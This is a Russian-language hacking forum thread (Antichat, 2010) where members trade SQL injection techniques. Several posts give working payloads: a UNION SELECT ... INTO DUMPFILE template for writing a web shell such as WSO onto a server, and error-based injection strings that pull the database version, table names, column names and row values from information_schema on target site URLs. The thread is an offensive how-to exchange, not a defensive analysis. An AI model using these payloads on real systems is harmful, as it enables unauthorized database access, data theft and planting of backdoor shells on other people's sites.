HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 18.08.2010, 19:39
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами: 8395840

Репутация: 5
По умолчанию

Не очень понял про работу с файлами.

Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос:

http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php

?

Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
 

  #152  
Старый 18.08.2010, 19:50
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Boa  
Не очень понял про работу с файлами.
Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос:
http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php
?
Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
/thread104591.html

Цитата:
Сообщение от None  
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
а я думал ты хакирь
 

  #153  
Старый 18.08.2010, 19:58
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами: 8395840

Репутация: 5
По умолчанию

Цитата:
Сообщение от None  

Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
 

  #154  
Старый 18.08.2010, 20:12
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Boa  
Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
емае...пример ''
 

  #155  
Старый 23.08.2010, 15:54
stragger
Новичок
Регистрация: 29.07.2010
Сообщений: 5
С нами: 8309846

Репутация: 0
По умолчанию

Можно ли с помощью отчёта об ошибках выводить имена таблиц из Information_schema?
 

  #156  
Старый 23.08.2010, 16:18
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Цитата:
Сообщение от stragger  
э.. не отказался бы от примера, у меня не получается...
Попробуй так:

+or+(select+count(*)from(select+1+union+select+2+u nion+select+3)x+group+by+concat(mid((select+versio n()),1,64),floor(rand(0)*2)))+--+

Если неполучится стучи в асю, помогу - 4000840.
 

  #157  
Старый 23.08.2010, 16:39
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от stragger  
э.. не отказался бы от примера, у меня не получается...
вывод таблиц

Код:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+table_name+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)--+
вывод колонок

Код:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+column_name+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)--+
вывод значений из таблицы

Код:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,%column_names%)+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.tables++group+by+2)--+
 

  #158  
Старый 23.08.2010, 17:10
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами: 9650471

Репутация: -2
По умолчанию

Цитата:
Сообщение от Boa  
Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
Гет запрос ограничение будет,да и любой скрипт всё равно подставить не получится: ).Нужно тогда и запрос изменять terminated by,enclosed by и т.д.

Эти же операторы вряд ли были рассчитаны на гет селект запросы ))).Для работы с файлами ещё понятно...)
 

  #159  
Старый 19.09.2010, 02:16
miako
Познающий
Регистрация: 20.01.2010
Сообщений: 43
С нами: 8582520

Репутация: 6
По умолчанию

Как побороть ЧПУ? Куда подставлять параметры? Инпутов нет.
 

  #160  
Старый 21.09.2010, 07:53
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами: 28659

Репутация: 0
По умолчанию

В пункт 4.2 нужно добавить БОЛЬШИМИ БУКВАМИ что операторы в hex не будут работать
 
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.